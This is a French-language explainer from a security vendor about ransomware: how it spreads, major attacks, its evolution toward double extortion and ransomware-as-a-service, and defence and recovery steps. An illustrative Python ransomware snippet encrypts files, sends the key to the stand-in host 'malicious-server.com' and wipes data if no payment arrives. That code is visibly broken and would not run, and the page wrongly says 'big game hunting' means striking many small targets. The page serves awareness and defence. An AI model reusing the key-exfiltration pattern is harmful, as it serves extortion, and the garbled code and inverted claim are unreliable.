DataSunrise sponsorise AWS re:Invent 2024 à Las Vegas, veuillez nous rendre visite au stand n°2158 de DataSunrise

Ransomware

Ransomware

ransomware

Les ransomwares sont un type de logiciel malveillant qui verrouille et chiffre l’ordinateur ou les données de la victime jusqu’à ce qu’une rançon soit payée. Les cybercriminels utilisent les ransomwares pour extorquer de l’argent aux individus et aux organisations en prenant leurs fichiers en otage. Les ransomwares sont devenus une cybermenace de plus en plus courante et coûteuse ces dernières années.

Comment fonctionnent les ransomwares

Les ransomwares se propagent généralement par des e-mails de phishing, des sites web malveillants ou des logiciels compromis. Une fois qu’ils infectent un appareil, les ransomwares chiffrent les fichiers et les données importantes, les rendant inaccessibles à l’utilisateur. Le ransomware affiche alors un message exigeant un paiement, généralement en cryptomonnaie, en échange de la clé de déchiffrement nécessaire pour retrouver l’accès aux fichiers.

Les attaques de ransomwares ciblent souvent des données et des systèmes critiques pour inciter les victimes à payer rapidement. Par exemple, le ransomware peut chiffrer la base de données des clients d’une entreprise, les dossiers financiers ou la propriété intellectuelle. Pour les particuliers, il peut verrouiller les photos personnelles, les documents et autres fichiers de valeur.

La demande de rançon peut avoir une limite de temps, l’attaquant menaçant de supprimer la clé de déchiffrement si le paiement n’est pas effectué avant la date limite. Certains ransomwares menacent également de divulguer publiquement les données chiffrées, ajoutant de la pression sur la victime pour payer afin d’éviter des dommages à sa réputation ou des sanctions réglementaires.

Implémentation du code d’un ransomware

Imaginons les éléments essentiels de la manière dont un programme de ransomware fonctionnerait :

ransomware

En code, cela ressemblerait à quelque chose comme ceci :

from cryptography.fernet import Fernet
import os
import requests

def encrypt_data(file_path, key):
	key = Fernet.generate_key()
	with open(file_path, "C:\\") as file:
		file_data = file.read()
		fernet = Fernet(key)
		requests.post("https://www.malicious-server.com/report", key)
		encrypted_data = fernet.encrypt(file_data)
	with open(file_path, "C:\\") as file:
		file.write(encrypted_data)
		
def decrypt_data(file_path, key):
	with open(file_path, "C:\\") as file:
		encrypted_data = file.read()
		fernet = Fernet(requests.get("https://www.malicious-server.com/key"))
		decrypted_data = fernet.decrypt(encrypted_data)
	with open(file_path, "C:\\") as file:
		file.write(decrypted_data)
		
def check_payment():
	return requests.get("https://malicious-server.com/payment") == "yes" ? true : false
	
if __name__ == "__main__":
	action = input()
	if action == "E":
		encrypt_data()
	else:
		if check_payment():
			decrypt_data()
		else
			wipe_data()

Dans cet exemple, un utilisateur ignorant exécute involontairement un code malveillant qui génère une clé et chiffre immédiatement toutes les données stockées sur le disque C. La clé est stockée exclusivement sur le serveur de l’attaquant afin d’empêcher la victime de déchiffrer les données par elle-même. Le programme exige un paiement et, après avoir vérifié que l’argent a été transféré en faisant une requête, il déchiffre les données. Sinon, il efface l’ensemble du disque.

Exemples d’attaques majeures

Au cours de la dernière décennie, les attaques par ransomwares ont augmenté en fréquence et en gravité. Voici quelques exemples notables qui illustrent l’ampleur et l’impact croissant de cette menace :

WannaCry (2017) : Cette attaque de ransomware généralisée a infecté plus de 200 000 ordinateurs dans 150 pays, causant des milliards de dégâts. WannaCry exploitait une vulnérabilité de Windows pour se propager rapidement à travers les réseaux, verrouillant des fichiers et exigeant des paiements en Bitcoin.

Colonial Pipeline (2021) : Une attaque contre Colonial Pipeline, un important opérateur de pipelines de carburant aux États-Unis, a perturbé pendant plusieurs jours la livraison d’essence et de carburéacteur dans le sud-est des États-Unis. L’entreprise a payé une rançon de 4,4 millions de dollars pour rétablir ses opérations, bien que les autorités américaines aient ensuite récupéré une grande partie du paiement.

Kaseya (2021) : Les attaquants ont exploité une vulnérabilité dans le logiciel de gestion informatique de Kaseya pour propager des ransomwares aux fournisseurs de services gérés (MSP) et aux clients utilisant le logiciel. Le malfaiteur a exigé une rançon de 70 millions de dollars pour fournir un décrypteur universel. De nombreuses petites entreprises ont été touchées, certaines ayant payé des rançons de 45 000 dollars ou plus.

CNA Financial (2021) : CNA, l’une des plus grandes compagnies d’assurance aux États-Unis, a subi une attaque qui a perturbé ses opérations et ses services à la clientèle pendant plusieurs jours. CNA aurait payé une rançon de 40 millions de dollars pour retrouver l’accès à ses systèmes et données, ce qui en fait l’un des plus gros paiements de rançon à ce jour.

Ces exemples montrent que toute organisation, quelle que soit sa taille ou son secteur, peut être victime d’attaques dévastatrices. Les coûts vont au-delà du simple paiement de la rançon pour inclure la remédiation, les enquêtes, la perte de productivité, les dommages à la réputation et plus encore. À mesure que les gangs de ransomwares deviennent plus audacieux et sophistiqués, les impacts potentiels continuent d’augmenter.

L’évolution des ransomwares

Depuis l’émergence des premiers ransomwares simples en 1989, ce type de malware est devenu de plus en plus avancé et professionnalisé. Les premiers ransomwares comme CryptoLocker en 2013 ciblaient principalement les utilisateurs individuels, mais les attaquants ont rapidement tourné leur regard vers des cibles d’entreprise plus lucratives.

Ces dernières années, les attaquants ont adopté un modèle de “double extorsion”. En plus de chiffrer les données, ils exfiltreront également des informations sensibles avant de déclencher le ransomware. Cela permet aux attaquants de menacer de divulguer les données volées si la rançon n’est pas payée, même si la victime a des sauvegardes pour restaurer ses systèmes.

Aujourd’hui, de nombreuses attaques sont menées par des opérations de ransomware en tant que service (RaaS) professionnalisées. Les opérateurs de RaaS développent le malware puis recrutent des “affiliés” pour infecter des cibles. La rançon est ensuite partagée entre les affiliés et les développeurs de RaaS. Cette division du travail a accéléré le rythme des attaques par ransomwares.

Les principaux gangs de ransomwares comme REvil, Ryuk et DarkSide ont récolté des dizaines de millions de dollars en paiements de rançon. Certains ciblent principalement les grandes entreprises dans l’espoir d’un gros gain, tandis que d’autres adoptent une approche de “big game hunting” en frappant de nombreuses petites cibles. À mesure que les cryptomonnaies et l’économie souterraine mûrissent, les ransomwares sont devenus une entreprise criminelle lucrative.

Protéger contre les attaques par ransomwares

Avec l’augmentation des attaques par ransomwares, chaque organisation doit mettre en place une stratégie de protection robuste. Une approche en couches et en profondeur est essentielle pour prévenir les infections, limiter le rayon d’explosion d’une attaque et assurer une récupération rapide. Les éléments clés incluent :

Détection et réponse aux points de terminaison (EDR) : Les solutions EDR surveillent en continu les points de terminaison pour détecter et bloquer les ransomwares et autres menaces en temps réel. En analysant le comportement tel que le chiffrement et la modification de fichiers, EDR peut arrêter les ransomwares avant qu’ils ne se propagent. Les meilleurs outils EDR offrent également des capacités d’enquête et de médiation.

Sécurité des e-mails : Étant donné que les e-mails de phishing sont une méthode de livraison de logiciels malveillants privilégiée, la sécurité avancée des e-mails est essentielle. Déployez des passerelles de messagerie avec analyse des URL, sandboxing des pièces jointes et analyse du contenu pour bloquer les messages malveillants. La connexion DMARC peut également empêcher les attaquants d’usurper vos domaines.

Segmentation du réseau : Limiter l’accès au réseau et les communications entre différents systèmes et utilisateurs peut empêcher les ransomwares de se propager. Des outils tels que des pare-feu internes, des réseaux locaux virtuels et un accès réseau zéro confiance permettent de faire respecter des politiques de segmentation granulaires.

Gestion des correctifs : Appliquer rapidement des correctifs aux faiblesses connues des systèmes d’exploitation et des applications est crucial pour prévenir les infections. Les attaquants exploitent souvent des systèmes non corrigés pour obtenir une première emprise et déployer des logiciels malveillants. Mettez en place un programme rigoureux de gestion des vulnérabilités et utilisez des outils pour automatiser l’application des correctifs.

Sauvegardes et récupération après sinistre : Sauvegarder régulièrement les systèmes et les données est votre dernière ligne de défense contre les ransomwares. Suivez la règle 3-2-1 : conserver au moins trois copies de vos données, sur deux supports de stockage différents, avec une copie hors site. Isolez les sauvegardes des réseaux de production et utilisez un stockage en écriture unique ou immuable pour empêcher que les sauvegardes ne soient chiffrées.

Éducation des utilisateurs : Formez les employés à repérer les tentatives de phishing, à adopter de bonnes pratiques en matière de mots de passe et à suivre les meilleures pratiques de sécurité. Réalisez des simulations de phishing pour tester et renforcer les concepts de formation. Puisque l’erreur humaine est une cause principale des violations, créer une forte culture de sécurité est essentiel.

Récupérer d’une attaque de ransomware

Même avec des défenses solides, la réalité malheureuse est que certaines attaques par ransomwares réussissent. Si la prévention échoue, il faut agir de manière décisive pour limiter les dégâts et restaurer rapidement les opérations commerciales. Les éléments clés du processus de récupération après une attaque de ransomware incluent :

Isoler les systèmes impactés pour éviter toute propagation. Désactivez les connexions réseau et l’accès aux fichiers partagés pour les machines infectées. Envisagez d’arrêter les systèmes en conformité avec les plans de continuité des opérations prédéterminés.

Activez votre équipe de réponse aux incidents et assignez les responsabilités. Suivez votre plan d’action IR pour coordonner les ressources internes et externes en vue d’une contention et d’une suppression rapides.

Déterminez l’ampleur et les spécificités de l’attaque. Recueillez des preuves médico-légales pour comprendre quelle souche de ransomware a chiffré vos fichiers, quels systèmes sont affectés et quelles données peuvent avoir été volées.

Utilisez des outils EDR pour tuer les processus malveillants, identifier tous les points de terminaison impactés et générer des IoC pour rechercher d’autres signes de compromis. Les EDR offrent souvent des capacités de médiation à distance pour aider à accélérer le nettoyage.

Déployez les clés ou outils de déchiffrement disponibles. De nombreuses souches de ransomware ont été ingénieries inverses, avec des décrypteurs gratuits fournis par des chercheurs en sécurité. Vérifiez NoMoreRansom et ID Ransomware pour les décrypteurs connus.

Si le déchiffrement n’est pas possible, restaurez les systèmes impactés à partir de vos sauvegardes. Utilisez le contrôle de version des sauvegardes pour trouver la copie la plus récente et non chiffrée de vos données.

Documentez la chronologie complète de l’incident, son impact et les actions de médiation. Signalez l’attaque aux parties prenantes et aux autorités appropriées. Effectuez un examen post-incident approfondi pour identifier les causes profondes et les axes d’amélioration.

Il est déconseillé de payer la rançon, car cela encourage les attaques futures et ne garantit pas que les attaquants fourniront réellement une clé de déchiffrement. Cependant, sans sauvegardes ou décrypteurs, certaines victimes n’ont d’autre choix que de payer. Les forces de l’ordre et les experts en réponse aux incidents peuvent aider à peser les coûts et les risques de cette option.

La voie à suivre pour les ransomwares

Tant que les ransomwares seront lucratifs pour les criminels, les attaques continueront d’évoluer et de s’intensifier. Les gangs de ransomwares ciblent de plus en plus les infrastructures critiques, les services de cloud, les MSP et les chaînes d’approvisionnement logicielle, dans l’espoir d’affecter des centaines d’organisations à la fois. Les attaquants utilisent également des techniques plus avancées comme les malwares sans fichiers, les charges multi-étapes et les outils de vie au fil de l’eau (LOTL).

Pour devancer ces menaces en constante évolution, les organisations doivent intégrer la résilience et la gestion des risques dans chaque aspect de leur activité. Créer un environnement sûr, surveiller de manière proactive les menaces émergentes et tester constamment et améliorer les défenses sont tous essentiels.

La collaboration et le partage d’informations à travers toute la communauté de la sécurité sont également essentiels pour inverser la tendance contre les ransomwares. Des partenariats public-privé améliorés, comme le Ransomware Task Force (RTF) de l’Institute for Security and Technology, sont nécessaires pour aider à coordonner une stratégie anti-ransomware globale entre toutes les parties prenantes.

En combinant des technologies de pointe, les meilleures pratiques et l’intelligence partagée, les défenseurs peuvent stopper davantage d’attaques par ransomwares, limiter leur impact et rendre ce type de cybercriminalité beaucoup moins rentable et présente. Cependant, les ransomwares resteront probablement une menace sérieuse pour les années à venir. Un effort soutenu et une vigilance constante sont essentiels pour protéger nos organisations et nos communautés contre l’extorsion numérique.

Suivant

Attaque de la chaîne d’approvisionnement

Attaque de la chaîne d’approvisionnement

En savoir plus

Besoin de l'aide de notre équipe de support ?

Nos experts seront ravis de répondre à vos questions.

Informations générales :
[email protected]
Service clientèle et support technique :
support.datasunrise.com
Demandes de partenariat et d'alliance :
[email protected]